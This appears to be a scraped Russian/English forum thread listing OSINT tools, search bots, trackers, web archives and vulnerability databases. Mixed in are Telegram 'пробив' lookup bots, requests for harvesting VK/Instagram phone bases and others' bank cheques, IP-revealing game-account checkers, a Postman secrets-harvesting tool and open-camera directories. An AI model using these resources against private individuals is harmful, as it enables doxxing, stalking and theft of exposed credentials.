![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FNcXL0Rd8i6hADelE1A2pFmXzLSZ573i28bI1PNJdgHEAy3PSNr6pFNxVl3zuq9AQRywT_O1CvN1FXi7rd- PdY4AmttGn0BqUFJdh4RG8pyTxjeOXEIHCdFhGlOAe_uN- xl_swWlVHqWji2JBS60iys6ImF4mJfGUrmkOiN3xblKke_wR1gjdppuQQC3BkybyA0ZCs2HVAJ- XuqriEYjkVRvku7IEh3L-4ulo1o5AmHRpX07m75zomyyMBoYBvrFblWriLgU-1sx59CAkz6K1hoPmTATu_KpP- wqmNCyT5gHOmLRyhreXPisxqUDY-6_wgLN1I1V5cyalra5owO4T1A.jpg&hash=d31c2603bfe66b300da33f1b4292a848&return_error=1)
Бот пробива от @IILLUMINAT Зеркало бота с 5 минутами халявого премиума: https://t.me/IILLUMINATSEYEBOT?start=1826221307
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FRkGvas1l4FsHh9iPQCuTQaFW_pIOVItHubeYXLWaXV5zfSM5_NXSPdDFGGPaGoY2E1X2ywARDVlKlwaju- wWQruITWNnpQdMgRCnUBQ7ma7567c18EmsbU2ZAW01Z1zBMcVhTkI854IT9D-1A8Ilfk24iTnMlAnP4gggmH- RN-LTD0LHXzyd5ROTIVtKcGfEbK- Qh9-3eKIH9TjaCsfLqBWXcMFMRBnAKL0CRD4j88YKoXCX4nHWO2RZl4eqH0m6gnJwrB1SUBgps7oXIolPNjuc88mRAC34nT7QeRQlPr17yHypRA7L6JtvRhrq2h3HbLCDIgyOQnZj9WpnEM6wCg.jpg&hash=cb845f064e5a7eb4acc4a34b09ba5a5b&return_error=1)
OSINT search engine bot.
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2Feg50MerTAxMkX1zHLUKqvMxuCQ2c8kKwtNlYPZUM2cGveBEnqI8Jklf3BhcTiOLEiwqDgOMlj6I7SBZUtyQcp80FlMnV9l19PLJdgzXs94R2MUhgqUFCI5gwbsZA54LkK52PbYy1VySoJkjuahB- Ij-R3X-FAndoJ9pf7_H8HW7p-KU4cGiWRQxucOR9VSFxzFlq1gPsxYZQPG6VNRD-vVEwt3O_- sOYO74gCWGMMmuJHTGOxyUaMNPm4jlHscmc_yK1iOnNrllh5CWfu0iQ9E7Rg41nIx8dRpc2OWs5zOyBhF7QTGVrBqOrN0aUx6uoldrmQbAkM99KsdGH7sgGlA.jpg&hash=b9366323b1c01985ca61745733ea2f85&return_error=1)
You can contact @DataBaseNow_Bot right away.
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FPNb1aVCWKW81Y3CtfnI9avSUzyK- oInLgwHjXEHkeYbsBIr2Ll4XcIXJeUb3VCU2pAo7s0LC5fPo5Kk0OV9uwZZUzgk9-Rcb0LPuD3JoSsJNX4dydEQtWtACxtb9lA3BhPgt3UAnk02MByiE0SdHGcfVBPWQW2DCjm5rI4XksTr35DoOfQQ2eNYTTaPuCP2Qopa9I4CjsdasLHuTc6inhEy49Sn1rQT6c1bCNQpujJnJwmKY7OMzYeFvKHkKo_cHd0np- miEn3A4YijKhkEisoZiU911ByvTnCfcOS1TG0zeBJ7SWsx6e_ukKQZujIdqO0IUJYpe7SrgXN- Vb7-9Ng.jpg&hash=bd324430ddb37252e2d3a580bf6c4429&return_error=1)
You can contact @SborshikOsintBot right away.
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn-telegram.org%2Ffile%2FOXka- hZiUNU5QP4-HO86154J70UDmFcLqFfopvWTwuV0fZrtd8jpkzNsZzrb2t2axB_bJsQGjZ2pB3MmVxETdJo2YhSPKNKEMQknW_3giiih1VajbDppikXi52_6QlhUndAEosKR4FTsAFOMbvK1Dk9sLZfNy7VKmaDbllZ98X4yqOPJjOImbRZXwZxEgFLI1D3vZX_2g4xGE41oE- jFuodRYndJZuYnKCt7Cdyby-ZyhYmucKEEJjVB_LeS- CHBxPxXJtgb0k7CfjWvzOwVYjWHnzbk3Ha9UQEntXG8UrzfLT9953dbe6wwmSCZ- ypCCXROccVBsted5WL5WrTJlA.jpg&hash=561f24d01279fe0fec323d2af794c595&return_error=1)
Идеальный пробив по любой информации
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn1.cdn- telegram.org%2Ffile%2FK7i4oe83xSRhynQd8XtvImKbuyugAdzIz4U8OzND3GQtPBTpH86oBiVi4lzb8JkKeMOxp9HJDCL2GQloqlqypVFpPkOkd14VKS6x7zEfm1XuQXnHjPmnEBN3iG25LH0uQuwkX4r05Aao1lIvYHwriciSEuffEI4eSe6Ixb7NCC9siFG3azZKiakW6W7pWgY2zlLKskzhrTVC0HeS_jrRrayeP_Si1CJbJgjQAmWxuFcAzHzf_qRJ8k7GnKTyjzp96bTsmw5XwmkMfanNopqrFIdvO- uxxNg3RHcgvt22fugLKwvw2Hbhfb5z7brIQ1WV0oL0ULopCH5oG2BoUaA5Cg.jpg&hash=52726a8a02058cf350fb578da2d9381c&return_error=1)
You can contact @o8jsysv3269_bot_bot right away.
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FlqCfe8R1zIrDTvRbj2KB-fJ- dNrjpTQVnkw_sTG5q4JiuN5WITlvBWTZ1fIpLg7jHe8Lf29R7eYITiS6cBr8Mcd_a7yNAGVXbLxE7dUExPNpCynnNTYrH1_gDwfPJmWdHqjMGZtlAgQU4kbV9iOGJh- sa6RwdJYux8VBA9etsMKuCA7fUUeiPo4s3FdG3iBnn5-72HoWkWRnueM0M8U9mHtC3jy_hMZFBD8e6VhDVOsW0C9BOKeipIlrTMUKAyQwGlXBj0M_AOCYbg_UnMY6NA4J_ESC4CSlPL__zpAhi- qBZVdSyNMtqHHTLsz_CegJNCWWQqlngxjeDsHPbTelZA.jpg&hash=d49b67103bd3aedaf93484d7113f64a9&return_error=1)
By @HowToFind
t.me
Эта статья ещё будет обновляться по мере поступления информации. Если Вы знаете ещё какие есть, пишите в комментарии, добавим)
OSINTTracker - простой и бесплатный онлайн-инструмент для визуализации
расследований и сбора данных о различных точках входа (домены, адреса
электронной почты, номера криптокошельков) с использованием сотен различных
онлайн-сервисов (доска детектива).
https://app.osintracker.com/
Для тех, у кого нет денег на платные продукты для визуализации расследований, посоветую еще:
https://www.maltego.com/
https://www.spiderfoot.net/
https://accentusoft.com/
Приветы всем.
Вот если я ищу чеки из банковской чековой книжки, где мне взять цифровые копии , сканы или фото не важно, главное чтобы инфо было видно? Где они могут быть и храниться? Кто-нибудь вообще предоставляет такой сервис по информации? Попадалось такое кому-то?
Всем привет, сегодня хотел бы вам подсказать список инструментов для поиска по странице вк.
Нужно достать базу клиентов с групп и инстаграмм аккаунтов с номерами телефонов, существуют ли способы это сделать ?
a collection of shodan/zoomeye queries, google dorks and other sources for ics/ot OSINT
ICSrank - Examine the Cybsercurity posture of ICS/OT devices on the internet
www.icsrank.com
Here's a cool tip if you need to scrap links with curl & grep:
curl yourdomain.com | grep -Eo "(http|https)://[a-zA-Z0-9./?=_%:-]*" | sort -u
(please like it if interest)
Goosint - 130 Web-enabled OSINT and Cybersecurity Tools.
Web-based OSINT tools that specialises in cybersecurity, cyberdefense and digital investigation. Goosint helps you gathering information you need about your target through publicly available data. This data will let you know more about a specific target or about your organization’s internet exposure.
Goosint focused on the most popular web-based Open Source Intelligence and Cybersecurity Tools. The goal is to help you find free cybersecurity, Threat Intelligence and OSINT resources.
![goosint.com](/proxy.php?image=https%3A%2F%2Fgoosint.files.wordpress.com%2F2023%2F06%2Fcropped- cropped- goosint2023.jpg%3Fw%3D32&hash=56687a35725934b9e24e052de3602ff9&return_error=1) goosint.com
Сделал небольшой парсер через эмулятор движка хрома для сбора поддоменов с dnsdumpster
Делает скрин и записывает в файл поддомены сайта
Требование node.js
Установка:
Распаковать все файлы в папку
в терминале node.js написать npm i (для установки расширении)
затем const domains = ["tjournal.ru", "youtube.com"]; добавить нужные домены и
написать npm index
запуск node index.js
Делалось на скорую руку, мб кому нужно.
Источник : https://t.me/Digitalntelligence
](https://vc.ru/u/1311068-digital-razvedka/522979-sozdaem-svoi-veb-arhivy-i- ishchem-chuzhie)
Веб-архивы - важнейшие инструменты во многих расследованиях, они позволяют просматривать сохранённые копии страниц в интернете.
![vc.ru](/proxy.php?image=https%3A%2F%2Fvc.ru%2Fstatic%2Fbuild%2Fvc.ru%2Ffavicons%2Fapple- touch-icon-180x180.png&hash=815515efbc06242364439d5a27d6e603&return_error=1) vc.ru
CoinMarketCap (https://coinmarketcap.com/)
Breadcrumbs (https://www.breadcrumbs.app/)
Cryptologos (https://cryptologos.cc/)
Esteroids (https://esteroids.xyz/#/)
Blockchair (https://blockchair.com/)
Blockchain.com (https://blockchain.com/)
A free tool to extract, view and download images from any website by using a virtual browser.
extract.pics
https://www.signpainter.us/successful-registry-add-company - Вывески и реклама Специальности
https://www.unitedcars.us/successful-registry-add-company - Автомобили - новые, подержанные, антикварные и классические
https://www.windowglass.us/successful-registry-for-modifying -
Стекло и окна
https://www.printlist.us/successful-registry-to-delete -
Чертеж | Принтеры | Трафаретная печать и т. д.
https://www.stonelist.us/successful-registry-for-modifying - Асфальт | Мощение | Сайдинг | Камень
https://www.usveterans.us/successful-registry-for-modifying -
Ветеранские и военные организации
https://www.usindustry.us/successful-registry-add-company - Промышленность США, лаборатории, исследования и разработки
https://www.taxilimo.us/successful-registry-add-company - Такси и лимузин- сервис
https://www.airunion.us/successful-registry-for-modifying -
Космос, Аэропорты, Авиакомпании
https://www.pestcontrols.us/successful-registry-add-company - Борьба с вредителями США
https://www.woodlist.us/successful-registry-add-company - Лесники | Пиломатериалы | Столяры и др.
https://www.storage24.us/successful-registry-for-modifying -
Перевозчики и хранение
https://www.metalunion.us/successful-registry-for-modifying -
Металлы | Производители металлов | Сварка и т. д.
https://www.flowerslist.us/successful-registry-for-modifying -
Флористы | Искусственные цветы, растения и деревья
https://www.churchunion.us/successful-registry-to-delete -
Церкви США
На руках также есть общие реестры(всех компаний) и поисковики по различным документам(суд, конгресс и т.д.). В наличии сайты с подборками ресурсов для проведения OSINT в Европе, Азии и США, доки служб разведки всего мира
**Bloodhound - набор аналитических инструментов (OSINT), предназначенных для
разведки в интернете.
Все инструменты и ссылки бесплатны, а так же постоянно обновляются.
https://colliertr.github.io/OSINT-dashboard/
**
The BBC Africa Eye Forensics Dashboard is a toolkit for journalists using open-source intelligence (OSINT) to carry out investigations. It collates essential tools tailored to help journalists analyze data and information.
https://start.me/p/m6OJgv/the-bbc-africa-eye-forensics-dashboard
I want to share the OSINT and privacy websites from ParrotOS so those that
don't use it can benefit.
I'm sure many tools are already known, but maybe you find something new!
Full list here: https://gist.github.com/chukfinley/08f4154c913d588033e9871e82809dad
Air & Space tracking:
ADS-B Exchange - track aircraft live - aircraft flight history
![globe.adsbexchange.com](/proxy.php?image=https%3A%2F%2Fglobe.adsbexchange.com%2Fimages%2Fcropped- Stealth-1-32x32.png&hash=fbad64b54da6f7d6ed96e0f417aaa0fa&return_error=1) globe.adsbexchange.com
Best Flight Tracker: Live Tracking Maps, Flight Status, and Airport Delays for airline flights, private/GA flights, and airports.
flightaware.com
Real-time flight tracking with one of the best and most accurate ADS-B coverage worldwide. Check airport arrivals and departures status and aircraft history.
www.radarbox.com
Live tracking of radiosonde flights. Data via SondeHub v2. Includes weather overlay, predictions, and access to historic radiosonde flights on sondehub.
tracker.habhub.org
![satellitemap.space](/proxy.php?image=https%3A%2F%2Fsatellitemap.space%2Fandroid- chrome-512x512.png&hash=24a5eab96685ce683b0f69378bf319df&return_error=1)
Live view of SpaceX starlink satellite constellation and coverage.
satellitemap.space
![geoxc-apps2.bd.esri.com](/proxy.php?image=https%3A%2F%2Fgeoxc- apps.bd.esri.com%2Fspace%2Fsatellite- explorer%2Fassets%2Fimage.jpeg&hash=8fd0ef9852939a981c73697c4b512a97&return_error=1)
Satellite map of active satellites orbiting the Earth. View satellites along with information about the purpose, operator, orbital parameters, launch date & location of the satellite.
![geoxc- apps2.bd.esri.com](/proxy.php?image=https%3A%2F%2Fwww.esri.com%2Fcontent%2Fdam%2Fesrisites%2Fen- us%2Fcommon%2Ffavicon%2Fesri-favicon- dark-32.png&hash=e01dc5282e01981a2cee6237ac64182a&return_error=1) geoxc- apps2.bd.esri.com
![in-the-sky.org](/proxy.php?image=https%3A%2F%2Fin-the- sky.org%2F%2Fscreenshots%2Fsatmap.png&hash=9193203a43a39b4f1e92ace524e68ccc&return_error=1)
sky.org/satmap_worldmap.php)
A world map of the positions of satellites above the Earth's surface, and a planetarium view showing where they appear in the night sky.
in-the-sky.org
Land & Sea tracking:
OpenRailwayMap - An OpenStreetMap-based project for creating a map of the world's railway infrastructure.
www.openrailwaymap.org
Live train tracker and more: Worldwide live positions of trains, busses, trams and other public transport vehicles. Find out if your train is on time and see where it is located right now.
mobility.portal.geops.io
See trains moving in real-time on one of our 138 live track diagrams
www.opentraintimes.com
Camera tracking:
](http://www.insecam.org/)
Insecam.com - the world biggest directory of online cameras. Watch live street, traffic, parking, office, road, beach, earth online webcams. .
![www.insecam.org](/proxy.php?image=http%3A%2F%2Fwww.insecam.org%2Fstatic%2Fapple- touch-icon-57x57.png&hash=d939ecd10fe1414f262a1195e4be20fb&return_error=1) www.insecam.org
Displays images from hundreds of webcams, cameras around the world, including a description of the web cam location. and Displays worldwide webcam images on the Google map.
![world-webcams.nsspot.net](/proxy.php?image=http%3A%2F%2Fworld- webcams.nsspot.net%2F.%2Ffavicon.ico&hash=f6d82b4966c401be2b71c5caf0512d90&return_error=1) world-webcams.nsspot.net
![www.earthcam.com](/proxy.php?image=https%3A%2F%2Fstatic.earthcam.com%2Fimages%2Fsocialnetworking%2Fsocial- media-thumbnail.jpg%3F2&hash=77ccd676737cc0ccf91af2328013f4f5&return_error=1)
EarthCam is the leading network of live streaming webcams for tourism and entertainment. Explore unique and interesting locations around the world with 4K streaming technology. EarthCam provides complete infrastructure services to manage, host and maintain live streaming video solutions for its...
![www.earthcam.com](/proxy.php?image=https%3A%2F%2Fstatic.earthcam.com%2Fapple- touch-icon.png&hash=fb9dedc563fb0739bea989be0cd90c64&return_error=1) www.earthcam.com
worldcam.eu
](http://www.opentopia.com/hiddencam.php)
Browse Opentopia's vast webcam database, containing thousands of live webcam views from around the world
www.opentopia.com
](https://www.livefromiceland.is)
Watch live feeds from our webcams with spectacular views of Iceland. Our streaming cameras are placed all around Iceland and broadcast 24/7. The ultimate slow TV!
www.livefromiceland.is
Search engines:
Search engine of Internet-connected devices. Create a free account to get started.
www.shodan.io
www.zoomeye.org
Hunter is the leading solution to find and verify professional email addresses. Start using Hunter and connect with the people that matter for your business.
hunter.io
Maps and database of 802.11 wireless networks, with statistics, submitted by wardrivers, netstumblers, and net huggers.
wigle.net
Vuln DB:
The Exploit Database - Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.
![www.exploit-db.com](/proxy.php?image=https%3A%2F%2Fwww.exploit- db.com%2Ffavicon.ico&hash=2f3ef8e0d310f23c9d8de649a987be9a&return_error=1) www.exploit-db.com
Discover the latest WordPress security vulnerabilities. With WPScan's constantly updated database, protect your site from potential WordPress exploits.
wpscan.com
](https://patchstack.com/database)
Hand curated, verified and enriched vulnerability information by Patchstack security experts. Find all WordPress plugin, theme and core security issues.
patchstack.com
![nvd.nist.gov](/proxy.php?image=https%3A%2F%2Fnvd.nist.gov%2Fsite- media%2Fimages%2Ffavicons%2Ffavicon-32x32.png&hash=c2e63f3f7701e49493712e42a1b49706&return_error=1) nvd.nist.gov
exploits, references and more ](https://www.cvedetails.com)
CVEDetails.com is a vulnerability intelligence solution providing CVE security vulnerability database, exploits, advisories, product and CVE risk scores, attack surface intelligence, open source vulnerabilities, code changes, vulnerabilities affecting your attack surface and software...
www.cvedetails.com
Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers
packetstormsecurity.com
Number one vulnerability management and threat intelligence platform documenting and explaining vulnerabilities since 1970.
vuldb.com
Site 1 of WLB Exploit Database is a huge collection of information on data communications safety.
cxsecurity.com
Independent Bug Bounty Programs, Responsible Disclosure & Vulnerability Coordination Platform - INDEX ](https://www.vulnerability-lab.com)
VULNERABILITY LAB - SECURITY VULNERABILITY RESEARCH LABORATORY - Best Independent Bug Bounty Programs, Responsible Disclosure & Vulnerability Coordination Platform
www.vulnerability-lab.com
Privacy & Security:
![eff.org](/proxy.php?image=https%3A%2F%2Fwww.eff.org%2Ffiles%2Feff- og.png&hash=bff308797dbbd92a4c9a9d5677ea2c3c&return_error=1)
Defending your rights in the digital world
eff.org
We’re the Electronic Frontier Foundation, an independent non-profit working to protect online privacy for over thirty years. This is Surveillance Self- Defense: our expert guide to protecting you and your friends from online spying. Read the BASICS to find out how online surveillance works. Dive...
ssd.eff.org
encryption ](https://emailselfdefense.fsf.org)
Email surveillance violates our fundamental rights and makes free speech risky. This guide will teach you email self-defense in 40 minutes with GnuPG.
emailselfdefense.fsf.org
![www.torproject.org](/proxy.php?image=https%3A%2F%2Fwww.torproject.org%2Fstatic%2Fimages%2Ftor- project-logo-onions.png&hash=7f4bb5370f8d9ec82ec2d17ddb42155b&return_error=1)
Defend yourself against tracking and surveillance. Circumvent censorship.
www.torproject.org
http://s4k4ceiapwwgcm3mkb6e4diqecpo7kvdnfr5gg7sph7jjppqkvwwqtyd.onion
](https://www.deepl.com)
Translate texts & full document files instantly. Accurate translations for individuals and Teams. Millions translate with DeepL every day.
www.deepl.com
](https://filen.io)
Filen – Next Generation End-To-End Encrypted Cloud Storage. Get started with 10 GB of free space.
filen.io
A public and free DNS service for a better security and privacy
quad9.net
](https://www.privacytools.io)
The most reliable website for privacy tools since 2015. Software, services, apps and privacy guides to fight surveillance with encryption for better internet privacy.
www.privacytools.io
**NAMINT - Простой инструмент на javascript для подготовки возможных шаблонов
поиска имени и логина со ссылками.
Tiny Scan simplifies the process of scanning a URL. You can easily input the desired web address and configure various parameters to tailor the scan according to your specific needs. Here are some of the parameters you can customize.
Obtaining URL Information:
- IP and Location: Discover the IP address associated with the URL, as well as the geographical location of the server hosting the website. This information can be crucial for understanding the website's infrastructure and targeting specific regions.
- Desktop and Mobile Screenshots: Gain visual representations of how the website appears on both desktop and mobile devices. These screenshots can help you assess the website's design, layout, and responsiveness across different platforms.
- ASN (Autonomous System Number): Identify the Autonomous System Number associated with the URL. This information provides insights into the organization responsible for hosting the website and can be valuable for competitive analysis or network troubleshooting.
Analysis of HTML Document:
- Links and Anchor Texts: Discover all the links present on the webpage, along with their corresponding anchor texts. This information is valuable for understanding the website's internal linking structure and identifying potential optimization opportunities.
- JavaScript Variables and Types: Gain insights into the JavaScript variables used on the webpage, along with their respective types. This data can help you understand the scripting logic employed by the website and identify any potential issues or optimizations.
source: www.tiny-scan{.}com
Porch Pirate - это наиболее полный фреймворк и клиент Postman recon/OSINT, который позволяет автоматически обнаруживать и использовать конечные точки API и секреты, связанные с рабочими пространствами, коллекциями, запросами, пользователями и командами. Porch Pirate может использоваться как клиент или встраиваться в ваши собственные приложения.
Porch Pirate перечисляет и представляет конфиденциальные результаты (глобальные секреты, уникальные заголовки, конечные точки, параметры запроса, авторизация и т.д.) общедоступных объектов Postman, таких как:
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F709556270%2Ff5724cae- aed3-40a0-ab11-61581606c19d&hash=b1a18b672fda9312ddf041706638b369&return_error=1)
comprehensive Postman recon / OSINT client and framework that facilitates the automated discovery and exploitation of API endpoints and secrets committed to workspaces, collections, ](https://github.com/mandconsultinggroup/porch- pirate)
Porch Pirate is the most comprehensive Postman recon / OSINT client and framework that facilitates the automated discovery and exploitation of API endpoints and secrets committed to workspaces, col...
github.com
Google, Bing, and DuckDuckGo.
![dorkgenius.com](/proxy.php?image=https%3A%2F%2Fb4317b56685401192dc973e36ff45693.cdn.bubble.io%2Ff1680008310207x275433666323816600%2FLogo- icon.svg&hash=0fc9cad05d761587677247abb4f2e13b&return_error=1)
DorkGenius is the ultimate tool for generating custom search queries for Google, Bing, and DuckDuckGo. - Our cutting-edge app uses the power of AI to help you create advanced search queries that can find exactly what you're looking for on the web.
![dorkgenius.com](/proxy.php?image=https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1680007903000x613460647613036200%2FLogo- icon.svg&hash=1f277eea268bb14e191396f4e1441f97&return_error=1) dorkgenius.com
kind of osintframework refreshed
Hello! This tool here is really great!
CertWatcher is a tool for capturing and tracking certificate transparency logs, using YAML templates. The tool helps detect and analyze websites using regular expression patterns and is designed for ease of use by security professionals and researchers.
Certwatcher continuously monitors the certificate data stream and checks for patterns or malicious activity. Certwatcher can also be customized to detect specific phishing, exposed tokens, secret api key patterns using regular expressions defined by YAML templates.
Certwatcher allows you to use custom templates to display the certificate information. We have some public custom templates available from the community. You can find them in our repository.
No tool, just curl or direct url.
Let say you search for subdomains of "mydomain.com".
Go for it: https://web.archive.org/cdx/search/cdx?url=.mydomain.com/&output=text&fl=original&collapse=urlkey
https://skidsearch.net/- в основном находит
только очень старые аккаунт и почти бесполезен так как аккаунты часто
перепродаются но все равно может помочь в поиске
https://vipchecker.ru/ - платная и большая база в основном ищет по русским
серверам так же может показать другие аккаунты с того-же айпи
https://namemc.com/ - открытый список майнкрафт аккаунтов можно смотреть
старые ники
https://laby.net/ - если человек скрыл историю имен то можно посмотреть тут
https://t.me/vimebasebot - вероятно что у игрока с снг есть аккаунт и на
ваймворолде тут бот выдасть айпи время в сети и дату регистрации
https://t.me/ccrobot - тоже чекер, в боте присутствует множество различных
баз
F4Map: I think it's the best tool for 3D and building height data to geolocate images. The global 3D coverage is best among all tested tools.
demo.f4map.com
(please leave a like if you like it)
Как узнать настоящий номер телефона или почту по вирт. номеру?
Search in Google Lens in lingo!
Tired of irrelevant results of reverse image search? Yeah, search results can
be VERY different because of your language environment!
**
Lingolens allows:**
search images in Google Lens with specific languages and countries, excluding
known results
generate one simple HTML report with all the results
provide you a possibility to compare the target image with the result images
a pretty user interface is supported!
Installation:
Requests and bs4 are required for the CLI version of the tool. Streamlit is required for User Interface.
Code:Copy to clipboard
pip3 install -r requirements.txt
As a browser-based tool
Code:Copy to clipboard
streamlit run web_search.py
By default, Streamlit create a local application http://localhost:8501/. You
can try to deploy it on cloud infrastructure, but Google will very quickly ask
script for captcha.
Then just choose the appropriate languages (mandatory) and countries
(optional) and upload your image.To download the report click the button
"Download report"
Источник : https://t.me/Digitalntelligence
https://archive.org/ - Самый крупный веб-архив в мире
https://archive.eu/ - Всеевропейский веб-архив
https://archive.today/ http://archive.is/ - какие-то ещё архивы,
являющиеся судя по всему зеркалами друг друга
https://oldweb.today/ - Показывает, как сайты выглядили раньше, однако на
данный момент не работает
](http://www.cachedpages.com/)
CachedPages.com - Get the cached page of any URL from several sources
www.cachedpages.com
https://cache.pw/
https://cachedpage.co/ http://cachedview.com/ - Просмотр кэша гугл и
яндекс, а также в реальном режиме
![www.nationalarchives.gov.uk](/proxy.php?image=https%3A%2F%2Fwww.nationalarchives.gov.uk%2Fwp- content%2Fuploads%2Fsites%2F33%2F2017%2F06%2FWORK-25_72-B3-A16-_2_1948-1952.jpg&hash=b5b9f951e1226f078da0e107d4f08c39&return_error=1)
](https://www.nationalarchives.gov.uk/webarchive/)
We capture, preserve, and make accessible UK central government information published on the web from 1996 to present.
![www.nationalarchives.gov.uk](/proxy.php?image=https%3A%2F%2Fwww.nationalarchives.gov.uk%2Fwp- content%2Fthemes%2Ftna- base%2Fimg%2Ffavicon.png&hash=447a757d62bba30f1f5fe88e5b0df7e7&return_error=1) www.nationalarchives.gov.uk
https://www.webarchive.org.uk/ - Веб-архивы Великобритании